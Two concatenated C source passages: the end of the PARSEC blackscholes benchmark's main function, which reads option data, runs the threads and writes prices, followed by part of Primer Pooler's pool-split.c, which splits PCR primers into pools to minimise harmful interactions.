#ifdef ERR_CHK
priceDelta = data[i].DGrefval - price;
if (fabs(priceDelta) >= 1e-4) {
printf("Error on %d. Computed=%.5f, Ref=%.5f, Delta=%.5f\n", i, price,
data[i].DGrefval, priceDelta);
numError++;
}
#endif
}
}
return 1;
}
#endif // ENABLE_TBB
int main(int argc, char **argv) {
FILE *file;
int i;
int loopnum;
fptype *buffer;
int *buffer2;
int rv;
#ifdef PARSEC_VERSION
#define __PARSEC_STRING(x) #x
#define __PARSEC_XSTRING(x) __PARSEC_STRING(x)
printf(
"PARSEC Benchmark Suite Version "__PARSEC_XSTRING(PARSEC_VERSION) "\n");
fflush(NULL);
#else
printf("PARSEC Benchmark Suite\n");
fflush(NULL);
#endif // PARSEC_VERSION
#ifdef ENABLE_PARSEC_HOOKS
__parsec_bench_begin(__parsec_blackscholes);
#endif
if (argc != 4) {
printf("Usage:\n\t%s <nthreads> <inputFile> <outputFile>\n", argv[0]);
return 1;
}
nThreads = atoi(argv[1]);
char *inputFile = argv[2];
char *outputFile = argv[3];
// Read input data from file
file = fopen(inputFile, "r");
if (file == NULL) {
printf("ERROR: Unable to open file %s.\n", inputFile);
return 1;
}
  rv = fscanf(file, "%i", &numOptions);
if (rv != 1) {
printf("ERROR: Unable to read from file %s.\n", inputFile);
fclose(file);
return 1;
}
if (nThreads > numOptions) {
printf("WARNING: Not enough work, reducing number of threads to match "
"number of options.\n");
nThreads = numOptions;
}
#if !defined(ENABLE_THREADS) && !defined(ENABLE_OPENMP) && !defined(ENABLE_TBB)
if (nThreads != 1) {
printf("Error: <nthreads> must be 1 (serial version)\n");
return 1;
}
#endif
// alloc spaces for the option data
data = (OptionData *)malloc(numOptions * sizeof(OptionData));
prices = (fptype *)malloc(numOptions * sizeof(fptype));
for (loopnum = 0; loopnum < numOptions; ++loopnum) {
rv = fscanf(file, "%f %f %f %f %f %f %c %f %f", &data[loopnum].s,
&data[loopnum].strike, &data[loopnum].r, &data[loopnum].divq,
&data[loopnum].v, &data[loopnum].t, &data[loopnum].OptionType,
&data[loopnum].divs, &data[loopnum].DGrefval);
if (rv != 9) {
printf("ERROR: Unable to read from file %s.\n", inputFile);
fclose(file);
return 1;
}
}
rv = fclose(file);
if (rv != 0) {
printf("ERROR: Unable to close file %s.\n", inputFile);
return 1;
}
#ifdef ENABLE_THREADS
pthread_mutexattr_init(&_M4_normalMutexAttr);
// pthread_mutexattr_settype( &_M4_normalMutexAttr, PTHREAD_MUTEX_NORMAL);
_M4_numThreads = nThreads;
{
int _M4_i;
for (_M4_i = 0; _M4_i < MAX_THREADS; _M4_i++) {
_M4_threadsTableAllocated[_M4_i] = 0;
}
};
#endif
printf("Num of Options: %d\n", numOptions);
printf("Num of Runs: %d\n", NUM_RUNS);
#define PAD 256
#define LINESIZE 64
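// Editorial note: the pointer arithmetic below over-allocates by PAD bytes,
// then adds PAD and masks off the low bits, so each derived pointer lands on
// a 64-byte (LINESIZE) boundary inside the padded region; this is a
// cache-line alignment precaution against false sharing between threads.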
buffer = (fptype *)malloc(5 * numOptions * sizeof(fptype) + PAD);
sptprice = (fptype *)(((unsigned long long)buffer + PAD) & ~(LINESIZE - 1));
strike = sptprice + numOptions;
rate = strike + numOptions;
volatility = rate + numOptions;
otime = volatility + numOptions;
buffer2 = (int *)malloc(numOptions * sizeof(fptype) + PAD);
otype = (int *)(((unsigned long long)buffer2 + PAD) & ~(LINESIZE - 1));
for (i = 0; i < numOptions; i++) {
otype[i] = (data[i].OptionType == 'P') ? 1 : 0;
sptprice[i] = data[i].s;
strike[i] = data[i].strike;
rate[i] = data[i].r;
volatility[i] = data[i].v;
otime[i] = data[i].t;
}
printf("Size of data: %d\n", numOptions * (sizeof(OptionData) + sizeof(int)));
#ifdef ENABLE_PARSEC_HOOKS
__parsec_roi_begin();
#endif
#ifdef ENABLE_THREADS
#ifdef WIN32
printf("WIN32\n");
HANDLE *threads;
int *nums;
threads = (HANDLE *)malloc(nThreads * sizeof(HANDLE));
nums = (int *)malloc(nThreads * sizeof(int));
for (i = 0; i < nThreads; i++) {
nums[i] = i;
threads[i] = CreateThread(0, 0, bs_thread, &nums[i], 0, 0);
}
WaitForMultipleObjects(nThreads, threads, TRUE, INFINITE);
free(threads);
free(nums);
#else
int *tids;
tids = (int *)malloc(nThreads * sizeof(int));
for (i = 0; i < nThreads; i++) {
tids[i] = i;
{
int _M4_i;
for (_M4_i = 0; _M4_i < MAX_THREADS; _M4_i++) {
if (_M4_threadsTableAllocated[_M4_i] == 0)
break;
}
pthread_create(&_M4_threadsTable[_M4_i], NULL,
(void *(*)(void *))bs_thread, (void *)&tids[i]);
_M4_threadsTableAllocated[_M4_i] = 1;
};
}
{
int _M4_i;
void *_M4_ret;
for (_M4_i = 0; _M4_i < MAX_THREADS; _M4_i++) {
if (_M4_threadsTableAllocated[_M4_i] == 0)
break;
pthread_join(_M4_threadsTable[_M4_i], &_M4_ret);
}
};
free(tids);
#endif // WIN32
#else // ENABLE_THREADS
#ifdef ENABLE_OPENMP
{
int tid = 0;
omp_set_num_threads(nThreads);
bs_thread(&tid);
}
#else // ENABLE_OPENMP
#ifdef ENABLE_TBB
tbb::task_scheduler_init init(nThreads);
int tid = 0;
bs_thread(&tid);
#else // ENABLE_TBB
// serial version
int tid = 0;
bs_thread(&tid);
#endif // ENABLE_TBB
#endif // ENABLE_OPENMP
#endif // ENABLE_THREADS
#ifdef ENABLE_PARSEC_HOOKS
__parsec_roi_end();
#endif
// Write prices to output file
file = fopen(outputFile, "w");
if (file == NULL) {
printf("ERROR: Unable to open file %s.\n", outputFile);
return 1;
}
rv = fprintf(file, "%i\n", numOptions);
if (rv < 0) {
printf("ERROR: Unable to write to file %s.\n", outputFile);
fclose(file);
return 1;
}
for (i = 0; i < numOptions; i++) {
rv = fprintf(file, "%.18f\n", prices[i]);
if (rv < 0) {
printf("ERROR: Unable to write to file %s.\n", outputFile);
fclose(file);
return 1;
}
}
rv = fclose(file);
if (rv != 0) {
printf("ERROR: Unable to close file %s.\n", outputFile);
return 1;
}
#ifdef ERR_CHK
printf("Num Errors: %d\n", numError);
#endif
free(data);
free(prices);
#ifdef ENABLE_PARSEC_HOOKS
__parsec_bench_end();
#endif
  return 0;
}
|
pool-split.c | /*
This file is part of Primer Pooler (c) Silas S. Brown. For Wen.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <limits.h>
#include <time.h>
#include <signal.h>
#define NDEBUG
#include <assert.h>
#include "openmp.h"
#include "all-primers.h"
#include "triangle.h"
#include "numbers.h"
#include "memcheck.h"
#define USE_QSORT 0 /* set this to 1 if you want to qsort the moves and pick either the best or next-best at random; 0 (faster) to take only the best move. (TODO: user configurable?) */
#define PARALLELIZE_POOLSPLIT 1 /* having this at 1 can help find solutions more quickly (starts with a different initial randomization on each core)... */
#define PARALLELIZE_BESTMOVE 0 /* ...but setting this to 1 can make things SLOWER :-( unless dealing with a HUGE number of primer PAIRS (say, >2000 primers for >1000 pairs), otherwise the loop is too small for the parallelisation speedup to outweigh the thread-setup overhead */
/* Proposed move N = move primer N/(nPools-1) into pool currentPool + 1 + (N % (nPools-1)) (mod nPools).
(Therefore every move MOVES something; no 'no-op's, since 1+(m mod (range-1)) cannot express going back to start)
Immediate value = badnessContrib(cur) - badnessC(dest)
We could save some division in qsort's inner loop by
maintaing a separate array, but would need to profile
as might be outweighed by worse locality of reference.
These variables need to be available at module scope so
that our qsort comparison function can get at them:
*/
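/* Worked example (editorial addition): with nPools == 3, move m == 5 encodes
   primer 5/(3-1) == 2 moving to pool (pools[2] + 1 + (5 % 2)) % 3, i.e. two
   pools "ahead" of its current one; 1 + (m % (nPools-1)) lies in
   [1, nPools-1], so no move maps a primer back onto its current pool. */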
#if USE_QSORT
static int *qsort_pools, qsort_nPools,
*qsort_poolCounts, qsort_maxCount;
static ULL *qsort_bContrib;
/* otherwise we WON'T have them global, and we can be more
multi-threaded w/out having to stall every time we call
qsort (unless hard-code a pool of comparison funcs).
The qsort version is slower ANYWAY and off by default,
so I'm not too worried about having to stall for it. */
#endif
/* badness as ULL:
bits 63-48: unsigned short maxScore (or invalid)
bits 47-32: unsigned short num with this score
bits 31-16: unsigned short num with this score - 1
bits 15-0: unsigned short num with this score - 2
Note: bit 63 is always 0, so it's safe to cast to LL
and do a subtraction to compare which is better of two
states for qsort. But 'value of move' is NOT equal to
the DISTANCE between two of these; use valueOfReduction
*/
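/* Worked example (editorial addition): two interactions scoring 10 (the
   maximum), three scoring 9 and one scoring 8 encode as
     (10ULL<<48) | (2ULL<<32) | (3ULL<<16) | 1  ==  0x000A000200030001
   so comparing two badness values as integers first compares the worst
   score, then the counts at that score and the two levels below it. */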
typedef unsigned short US;
enum { InvalidCombination=0x4000 }; /* (also mentioned in 64.h etc) If score is real score, 129 should do if no primers can be that long in this program. But we'll need it higher if score is really -dG*10 (it's -dG*2 at the moment). Don't approach 0x8000 though, + allow room for possible overflow of next field (so no 0x7FFF), although subtractBadness / valueOfReduction might need attention if we actually come to expect overflows between fields */
static inline int maxScoreOfBadness(ULL badness) {
return (int)(badness>>48);
}
static inline void updateBadness(ULL *badness,int score) {
int max = maxScoreOfBadness(*badness);
assert(max <= InvalidCombination); assert(score <= InvalidCombination);
if (score > max) {
if (score > max+2) {
*badness = ((ULL)score << 48) | ((ULL)1 << 32);
return;
} else while(score > max) { /* (TODO: could just write out the 2 cases of this loop, and change the below shifts into AND and add, IF profiling shows this needs it) */
*badness = ((*badness >> 16) & 0xFFFFFFFFLL) | ((((*badness)>>48)+1)<<48); max++;
}
} /* now score <= max */
int lswScore = max - 2;
if(score < lswScore) return; /* this score is too insignificant to count at the current maximum level */
int sL = (score-lswScore)*16;
if(((*badness>>sL)&0xFFFF)==0xFFFF) return; /* saturated */
*badness += ((ULL)1 << sL);
assert(maxScoreOfBadness(*badness) == max);
}
static inline int subtractBadness(ULL *badness,int score) {
/* for incremental updates. Assume score has previously
been included in updateBadness, so we don't have to
worry about crossing 0 here. */
int max = maxScoreOfBadness(*badness);
assert(score <= max);
int lswScore = max - 2;
if(score < lswScore) return 0; /* this score is too insignificant to affect the counters */
int sL = (score-lswScore)*16;
if(((*badness>>sL)&0xFFFF)==0xFFFF) return 0; /* if it was saturated, we'll have to leave it "stuck" there I'm afraid (unless return 1 to recalculate, but in many cases it would just saturate again) */
*badness -= ((ULL)1 << sL);
return !((*badness>>32)&0xFFFF); /* recalc max if count(max)==0 */
}
static inline ULL valueOfReduction(ULL from,ULL to) {
/* for qsort etc. We COULD return negative values as
LL, but that would be more computation and we might
as well just return 0, since we won't perform any
value-based moves that don't have positive reductions
*/
if(to > from) return 0;
if(!to) return from;
if(maxScoreOfBadness(from) == maxScoreOfBadness(to)) {
/* 'from-to' will be a 48-bit value, and if get here
then the high 16 bits of 'to' will be <= 'from',
but if the mid 16 bits are >= then we need to set
all of the low 32 bits to 0, and if the bottom
16 bits are >= then we need to set low 16 to 0. */
ULL hi = (from & ((ULL)0xFFFF<<32)) - (to & ((ULL)0xFFFF<<32)), /* do NOT factor out the & part! */
mid1 = from & ((ULL)0xFFFF<<16),
mid2 = to & ((ULL)0xFFFF<<16);
if (mid2 > mid1) return hi;
ULL lo1 = from & 0xFFFF, lo2 = to & 0xFFFF;
if (lo2 > lo1) return hi | (mid1-mid2);
return from-to;
}
/* maxScoreOfBadness(from) > maxScoreOfBadness(to) :
at the very least we need to 0-out the bottom 48 bits
(TODO: we might be able to add some back in if
maxScoreOfBadness(from) <= maxScoreOfBadness(to)+2,
but probably OK just to do this for now...)
*/ return (from & ((ULL)0xFFFF<<48)) - (to & ((ULL)0xFFFF<<48));
}
static inline int primerOfMove(int m,int nPools) {
return m/(nPools-1); }
static inline int oldPoolOfMove(int m,int nPools,const int* pools) {
return pools[primerOfMove(m,nPools)]; }
static inline int poolOfMove(int m,int nPools,const int* pools) { return (oldPoolOfMove(m,nPools,pools)+1+(m % (nPools-1))) % nPools; }
static inline int primerAndDest_to_moveNo(int primer,int newPool,int nPools,const int *pools) {
// works only if newPool != current pool
return ((newPool+nPools-pools[primer]-1) % nPools) + primer*(nPools-1);
}
static inline int primerAndPool_to_contribOffset(int primer,int pool,int nPools) {
return primer * nPools + pool; }
static inline int move_to_contribOffset(int m,int nPools,const int* pools) {
return primerAndPool_to_contribOffset(primerOfMove(m,nPools),poolOfMove(m,nPools,pools),nPools); }
static inline ULL valueOfMove(int m,int nPools,const int* pools,const ULL*bContrib,const int *poolCounts,int maxCount) {
if(maxCount && poolCounts[poolOfMove(m,nPools,pools)]==maxCount) return 0;
assert(!maxCount || poolCounts[poolOfMove(m,nPools,pools)]<maxCount);
ULL from = bContrib[primerAndPool_to_contribOffset(primerOfMove(m,nPools),oldPoolOfMove(m,nPools,pools),nPools)], /* what this primer was contributing to its old pool */
to = bContrib[move_to_contribOffset(m,nPools,pools)]; /* what this primer will contribute to its new pool */
assert(!to || poolCounts[poolOfMove(m,nPools,pools)]);
return valueOfReduction(from,to);
}
#if USE_QSORT
static int betterMoves1st(const void *aP, const void *bP){
int a = *(int*)aP, b = *(int*)bP;
ULL vA = valueOfMove(a,qsort_nPools,qsort_pools,qsort_bContrib,qsort_poolCounts,qsort_maxCount), vB = valueOfMove(b,qsort_nPools,qsort_pools,qsort_bContrib,qsort_poolCounts,qsort_maxCount);
/* Can't just subtract as it'll overflow an int */
if (vA > vB) return -1; /* A is better, put first */
else if (vA == vB) return 0;
else return 1;
}
#else
static int findBestMove(const int *moves,int numMoves,int nPools,const int* pools,const ULL*bContrib,const int*poolCounts,int maxCount) {
int bestMove = moves[0];
ULL bestVal = valueOfMove(bestMove,nPools,pools,bContrib,poolCounts,maxCount);
#if PARALLELIZE_BESTMOVE && defined(_OPENMP)
#pragma omp parallel
#endif
{
int priv_bestMove = bestMove;
ULL priv_bestVal = bestVal;
int i;
#if PARALLELIZE_BESTMOVE && defined(_OPENMP)
#pragma omp for schedule(static)
#endif
for(i=1; i<numMoves; i++) {
ULL thisVal = valueOfMove(moves[i],nPools,pools,bContrib,poolCounts,maxCount);
if(thisVal > priv_bestVal) {
priv_bestVal = thisVal;
priv_bestMove = moves[i];
}
}
if(priv_bestVal > bestVal) {
#if PARALLELIZE_BESTMOVE && defined(_OPENMP)
#pragma omp critical
#endif
if (priv_bestVal > bestVal) {
bestVal = priv_bestVal;
bestMove = priv_bestMove;
}
}
} return bestMove;
}
#endif
/* and here is code to set up & maintain that bContrib: */
static void badnessContrib(int primer,const int *scores,int np,int nPools,const int *pools,ULL *bContrib) {
/* Assuming proposedPools[0:nPools] == 0 on entry, set proposedPools[0:nPools] to answer the Q: What contribution to the overall "badness" would primer make, assuming it were moved to (or left as-is in) proposedPools[n] and no other changes were made? */
assert(primer>=0 && primer<np);
ULL *proposedPools = bContrib + primer*nPools;
int i;
for(i=0; i<primer; i++) { /* ( <primer , primer ) */
int pool = pools[i]; assert(pool>=0 && pool<nPools);
updateBadness(proposedPools+pool,scores[primer-i]); /* if we put 'primer' in the same pool as 'i' is, we'll get the badness of the interaction between i and primer */
scores += (np-i);
}
++scores; /* i==primer, ignore interaction w. itself */
for(++i; i<np; i++,scores++) { /* ( primer, >primer ) */
int pool = pools[i]; assert(pool>=0 && pool<nPools);
updateBadness(proposedPools+pool,*scores);
}
}
static void badnessContribUpdate(int primer,const int *scores,int np,int otherPrimer,int otherOldPool,int nPools,const int *pools,ULL *bContrib,const int *poolCounts) {
/* as above but just incrementally update primer's proposedPools in light of the fact that otherPrimer has just moved from otherOldPool to its current pool */
assert(primer>=0 && primer<np && otherPrimer>=0 && otherPrimer<np && otherOldPool>=0 && otherOldPool<nPools);
ULL *proposedPools = bContrib + primer*nPools;
int s, otherNewPool = pools[otherPrimer];
assert(otherNewPool>=0 && otherNewPool<nPools);
if(otherPrimer == primer) return;
s = scores[t_offset(np,primer,otherPrimer)]; /* the score-contribution of interaction between primer and otherPrimer */
if(!poolCounts[otherOldPool])
proposedPools[otherOldPool] = 0; /* like the loop below but also clears any saturation (since we know there won't be saturation if the pool was left empty) */
else if(subtractBadness(proposedPools+otherOldPool,s)) {
/* oops, need to recalc the max of otherOldPool */
proposedPools[otherOldPool] = 0;
int i;
for(i=0; i<primer; i++) { /* ( <primer , primer ) */
if(pools[i] == otherOldPool)
updateBadness(proposedPools+otherOldPool,scores[primer-i]);
scores += (np-i);
}
++scores;
for(++i; i<np; i++,scores++) {
if(pools[i]==otherOldPool)
updateBadness(proposedPools+otherOldPool,*scores);
}
}
updateBadness(proposedPools+otherNewPool,s);
}
static ULL globalBadness(const int *score,int np,const int *pools) {
/* Measure across all primers in all pools. We might
perhaps be able to optimise this by making use of
what we've already calculated in bContrib, but this
function is called only when we get to local maxima.
*/
int i,j; ULL m=0;
for(i=0; i<np; i++) for(j=i; j<np; j++) if(pools[i]==pools[j]) updateBadness(&m,*score++); else score++;
return m;
}
static inline void make_a_move(int m,int np,const int *scores,const int *primerMove_depends_on,int nPools,int *pools,ULL *bContrib,int *poolCounts,int maxCount) {
int primer = primerOfMove(m,nPools),
oldPool = oldPoolOfMove(m,nPools,pools),
newPool = poolOfMove(m,nPools,pools);
assert(primer >= 0 && primer < np && oldPool>=0 && newPool>=0 && oldPool<nPools && newPool<nPools && oldPool != newPool);
pools[primer] = newPool; /* 'm' changes meaning now */
assert(poolCounts[oldPool]);
poolCounts[oldPool]--; poolCounts[newPool]++;
assert(!maxCount || poolCounts[newPool]<=maxCount);
int i; for(i=0; i<np; i++) {
if(primerMove_depends_on[i]==primer)
pools[i] = newPool; /* see merge_scores_of_stuckTogether_primers (and DON'T need to update poolCounts here) */
else badnessContribUpdate(i,scores,np,primer,oldPool,nPools,pools,bContrib,poolCounts);
}
}
static inline int should_stick_together(AllPrimers ap,int i,int j) {
/* Names same except last letter = keep in same pool */
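  /* e.g. (illustrative): "geneX-F" and "geneX-R" have equal lengths and
     differ only in the last character, so the pair stays in one pool */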
const char *n1=ap.names[i], *n2=ap.names[j];
size_t l1=strlen(n1),l2=strlen(n2);
return (l1 == l2 && !strncmp(n1,n2,l1-1)); /* TODO: case-insensitive? */
}
static inline void updateMax(int *i,int m) {
if(m>*i) *i=m;
}
static int* merge_scores_of_stuckTogether_primers(AllPrimers ap,int *scores) {
int i,j,*p=scores; if(!p) return NULL;
int *primerMove_depends_on=malloc(ap.np*sizeof(int));
if(!primerMove_depends_on) return NULL;
memset(primerMove_depends_on,0xFF,ap.np*sizeof(int));
char *pairedOK=malloc(ap.np);
if(!pairedOK) {
free(primerMove_depends_on); return NULL;
}
memset(pairedOK,0,ap.np);
int doneMerge = 0;
for(i=0; i<ap.np; i++) for(j=i; j<ap.np; j++) {
if(i!=j && primerMove_depends_on[i]==-1 && primerMove_depends_on[j]==-1 && should_stick_together(ap,i,j)) {
/* For simplicity of pooling, we'll set it so:
- Interactions with i get maxed with those w.j
- Interactions with j itself "don't count"
- j is not allowed to be moved by itself
- j is always moved when i moves */
*p = 0; /* so S(i,j) = 0 */
int k,*kp=scores; /* max S(k,i) with S(k,j): */
int *Sip=0; /* =0 to suppress compiler warning */
for(k=0; k<j; k++) {
if(k<i) {
updateMax(kp+i-k,kp[j-k]); kp[j-k]=0;
} else if(k==i) {
Sip = kp+1; /* needed for S(i,k) */
} else { /* max S(i,k) with S(k,j) */
updateMax(Sip++,kp[j-k]); kp[j-k]=0;
}
kp += (ap.np-k);
} k++; kp++; Sip++; /* ignore k==j */
for(;k<ap.np;k++) {
/* max S(i,k) [=Sip] with S(j,k) [=kp] */
updateMax(Sip++,*kp); *kp++=0;
}
primerMove_depends_on[j] = i;
doneMerge = pairedOK[i] = pairedOK[j] = 1;
}
p++;
}
if(doneMerge) {
/* just check for lone primers, usually a bad sign */
for(i=0; i<ap.np; i++) if(!pairedOK[i]) fprintf(stderr,"Warning: ungrouped primer %s\n",ap.names[i]);
} else {
/* same message as in amplicons.c (see comment there)
in case overlap-check was missed */
fputs("WARNING: No primers are paired!\nPlease end your forward primers with -F\nand your reverse primers with -R or -B as instructed\n",stderr);
}
free(pairedOK); return primerMove_depends_on;
}
static inline int should_stick_to_pool(AllPrimers ap,int i) {
/* if the user wants some primers to be fixed to
specific pools (and we move the rest around) */
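  /* e.g. (illustrative): a primer named "@2:geneX-F" is fixed to the
     user-visible pool 2, returned below as the 0-based index 1 */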
const char *n=ap.names[i];
if(*n == '@' && *(++n)>='0' && *n<='9') {
char *end; int pool=(int)strtol(n,&end,10);
if(*end==':') {
/* we have a valid @<pool number>: */
return pool-1; /* (internally start at 0) */
}
}
return -1;
}
static int* pre_fix_primers_to_pools(AllPrimers ap) {
int *fix_to_pool=malloc(ap.np*sizeof(int)), i;
if(!fix_to_pool) return NULL;
for(i=0; i<ap.np; i++)
fix_to_pool[i] = should_stick_to_pool(ap,i);
return fix_to_pool;
}
static void saturate_scores_of_overlapping_primers(int *scores,const char *overlappingAmplicons,const int *primerNoToAmpliconNo,int nAmplicons,int np) {
int i,j,*p=scores; if(!p || !nAmplicons) return;
assert(overlappingAmplicons);
for(i=0; i<np; i++) for(j=i; j<np; j++) {
assert(*p<InvalidCombination);
if(i!=j && primerNoToAmpliconNo[i]!=-1 && primerNoToAmpliconNo[j]!=-1 && overlappingAmplicons[primerNoToAmpliconNo[i]*nAmplicons+primerNoToAmpliconNo[j]])
*p = InvalidCombination;
p++;
}
}
static void printNumInEachPool(const int *poolCounts,int numPools) {
fprintf(stderr,"\tPool sizes: "); int i;
for(i=0; i<numPools; i++) {
if(i) fprintf(stderr,"|");
fprintf(stderr,"%d",poolCounts[i] << 1); /* TODO: this "<< 1" assumes countOf(primerMove_depends_on==-1) == np/2, but that is almost certainly going to be the case, unless somebody is doing something very strange, and if the worst comes to the worst it's only an informational pool-size display going a bit wrong */
} fprintf(stderr,"\n");
}
static int IntCompare(const void *a,const void *b) {
return *(const int*)b-*(const int*)a;
}
static int* numInEachPool(const int *pools,int np,int numPools,const int *primerMove_depends_on) {
/* for after everything has finished and the per-thread poolCounts has been freed */
int* counts=calloc(numPools,sizeof(int));
if(!counts) return NULL;
int i; for(i=0; i<np; i++)
if(primerMove_depends_on[i]==-1)
counts[pools[i]]++;
qsort(counts,numPools,sizeof(int),IntCompare);
return counts;
}
enum { s_KeepGoing = 0, s_ccPressed, s_tooManyIters };
static volatile int stop_state;
static void intHandler(int s) { stop_state = s_ccPressed; }
static void randomise_pools(int np,const int *primerMove_depends_on,const int *fix_to_pool,const int *scores,int nPools,int *pools,ULL *bContrib,int *poolCounts,int maxCount) {
/* initialise to random distribution of pools, but note
primerMove_depends_on and maxCount when doing this.
Also initialise bContrib. */
int i; memset(poolCounts,0,nPools*sizeof(int));
/* First set all fixed-pool primers in place,
before randomising the others around them */
for(i=0; i<np; i++)
if(primerMove_depends_on[i] == -1) {
int pool = fix_to_pool[i];
if(pool != -1) {
if(maxCount && poolCounts[pool]==maxCount && !(maxCount==1 && nPools==np)) {
/* (last part of that condition detects call by suggest_num_pools,
where it's OK if fixed-pool primers make us exceed 1 per pool) */
fprintf(stderr, "randomise_pools ERROR: maxCount too small for fixed primer in pool %d\n",fix_to_pool[i]);
abort();
} pools[i]=pool; poolCounts[pool]++;
}
}
for(i=0; i<np; i++)
if(primerMove_depends_on[i] == -1 && fix_to_pool[i] == -1) {
int pool = ThreadRand() % nPools;
int origPool = pool;
while(maxCount && poolCounts[pool]>=maxCount) {
pool++; /* not very random but it'll do for now */
if(pool==nPools) pool=0;
if(pool==origPool) {
fprintf(stderr, "randomise_pools ERROR: maxCount too small, can't fit\n");
abort();
}
} pools[i]=pool; poolCounts[pool]++;
}
for(i=0; i<np; i++)
if(primerMove_depends_on[i]>-1)
/* DON'T update poolCounts here (it's in pairs so moveTooLopsided doesn't have to account for this one) */
pools[i]=pools[primerMove_depends_on[i]];
memset(bContrib,0,np*nPools*sizeof(ULL));
for(i=0; i<np; i++) badnessContrib(i,scores,np,nPools,pools,bContrib);
}
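/* Moves are encoded as single ints: there are np*(nPools-1) candidate
   (primer, destination-pool) moves, decoded by primerOfMove() and
   poolOfMove(). initMoves() below keeps only the moves whose primer is
   a lead primer (primerMove_depends_on == -1) and is not pinned by the
   @pool: syntax, then shrinks the array (memTrim) to the surviving
   count. */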
static int* initMoves(int *numMoves,int np,int nPools,const int *primerMove_depends_on,const int *fix_to_pool) {
if(nPools <= 1) return NULL;
int *moves=malloc(np*(nPools-1)*sizeof(int));
if(moves) {
int *movesP = moves, i;
for(i=0; i<np*(nPools-1); i++) {
int primer = primerOfMove(i,nPools);
if(primerMove_depends_on[primer]==-1
&& fix_to_pool[primer]==-1) *movesP++ = i;
}
*numMoves = movesP-moves;
moves = memTrim(moves,movesP);
} return moves;
}
#if Has_128bit
typedef bit128 ThreadMask;
#else
typedef ULL ThreadMask;
#endif
static void poolsplit_thread(const int* shared_moves,AllPrimers ap,int nPools,int numMoves,const int* primerMove_depends_on,const int* fix_to_pool,const int* scores,time_t limitTime,int *bestPools,const float* table, int* bestPools_init_yet,ULL* gBadLast,long *totalIterations,time_t *lastOutputTime,int *overlaps,int* just_printed_counts,ThreadMask* threads_needing_to_reset_iter,int maxCount) {
/* This is the inner part of split_into_pools.
Multiple instances may be called in parallel. */
int iter = 0, willContinue=1;
int *moves = (int*)shared_moves;
ULL *bContrib = malloc(ap.np*nPools*sizeof(ULL));
int *poolCounts=malloc(nPools*sizeof(int));
int *pools = NULL;
if(memFail(bContrib,poolCounts,_memFail))
willContinue = 0;
else {
pools = malloc(ap.np*sizeof(int));
if(memFail(pools,_memFail)) willContinue = 0;
else if(USE_QSORT) { /* moves must be per-thread */
moves=malloc(numMoves*sizeof(int));
if(memFail(moves,_memFail)) willContinue = 0;
else wrapped_memcpy(moves,shared_moves,numMoves*sizeof(int));
}
}
ThreadMask myMask = ((ThreadMask)1) << omp_get_thread_num(); /* for threads_needing_to_reset_iter */
if (!myMask) {
/* what, somebody's running us on >128 cores ?? (or >64 cores when no 128-bit type is available) */
/* (versions below v1.16 would hit this after 32 cores and not detect it) */
#if defined(_OPENMP)
#pragma omp critical
#endif
fprintf(stderr,"Can't run thread number %d because ThreadMask type has only %d bits\n",omp_get_thread_num(),(int)sizeof(ThreadMask)*8); /* If you hit this, I suggest you either find a wider ThreadMask type or else we'd better make it an array. Haven't done it so far because I've tested only on a 4-core machine and I doubt the chances of being run on many more cores than that are particularly high in 2016 (future might be different) */
willContinue = 0;
}
int max_iterations = 10000000 /* TODO: customise? profile? (but low priority as we have an interrupt mechanism) */
/ (omp_get_num_threads() > 10 ? 10 : omp_get_num_threads()); /* TODO: customise this "10" as well? (it's maxMoves / minMoves) */
while(willContinue) {
randomise_pools(ap.np,primerMove_depends_on,fix_to_pool,scores,nPools,pools,bContrib,poolCounts,maxCount);
for(; ; iter++) {
#if USE_QSORT
#if PARALLELIZE_POOLSPLIT && defined(_OPENMP)
#pragma omp critical
#endif
{
qsort_pools = pools; qsort_nPools = nPools;
qsort_bContrib = bContrib;
qsort_poolCounts = poolCounts;
qsort_maxCount = maxCount;
qsort(moves,numMoves,sizeof(int),betterMoves1st);
}
int bestMove = moves[0];
#else
int bestMove = findBestMove(moves,numMoves,nPools,pools,bContrib,poolCounts,maxCount);
#endif
if(*threads_needing_to_reset_iter & myMask) {
#if PARALLELIZE_POOLSPLIT && defined(_OPENMP)
#pragma omp critical
#endif
{
*threads_needing_to_reset_iter &= ~myMask;
*totalIterations += iter;
} iter = 0;
}
int timesUp = stop_state || (limitTime && time(NULL) >= limitTime);
if(timesUp || !valueOfMove(bestMove,nPools,pools,bContrib,poolCounts,maxCount)) {
/* looks like we're at a local maximum */
willContinue = !timesUp;
ULL gBad = globalBadness(scores,ap.np,pools);
int keep = !*bestPools_init_yet || gBad < *gBadLast;
if (keep)
#if defined(_OPENMP)
#pragma omp critical
#endif
if ((keep = !*bestPools_init_yet || gBad < *gBadLast) != 0) {
*bestPools_init_yet = 1;
wrapped_memcpy(bestPools,pools,ap.np*sizeof(int));
*gBadLast = gBad; *totalIterations += iter;
}
if(gBad < (ULL)1<<48) willContinue=0; // everything is down to score 0 - can't improve much on that (except by reducing # pools or size difference)
if (keep) {
iter = 0;
if(time(NULL)-*lastOutputTime > 2) {
int should_print_counts = 0;
#if PARALLELIZE_POOLSPLIT && defined(_OPENMP)
#pragma omp critical
#endif
if(time(NULL)-*lastOutputTime > 2) {
*lastOutputTime = time(NULL);
*threads_needing_to_reset_iter = ~0;
should_print_counts = 1;
} if(should_print_counts) {
*overlaps=table?dGprintPooledCounts(ap,pools,scores,stderr) : printPooledCounts(ap,pools,scores);
printNumInEachPool(poolCounts,nPools);
if(!willContinue) {
*just_printed_counts = 1; break; }
fprintf(stderr,"Local maxima found after %" QUOT "ld moves\nTrying to better it... (press Control-C to stop)\n",*totalIterations+iter); /* TODO: what about the 'iter' values of other threads? (or just don't count them yet) */
fflush(stderr); /* in case of broken Windows/WINE etc (see comments in user.c) */
}
}
} else {
/* this maximum doesn't beat the best we've seen */
if(iter>max_iterations && !stop_state) {
fputs("Too many moves without improvement: giving up\n",stderr);
willContinue=0; /* and stop other threads: */
stop_state = s_tooManyIters;
}
}
if(!willContinue) break;
if(keep) {
/* already found a good local maximum, so just take a few random steps away from it... */
int randomMoves = 5+ThreadRand()%5, i;
for(i=0; i<randomMoves; i++) {
int moveToMake=ThreadRand()%numMoves;
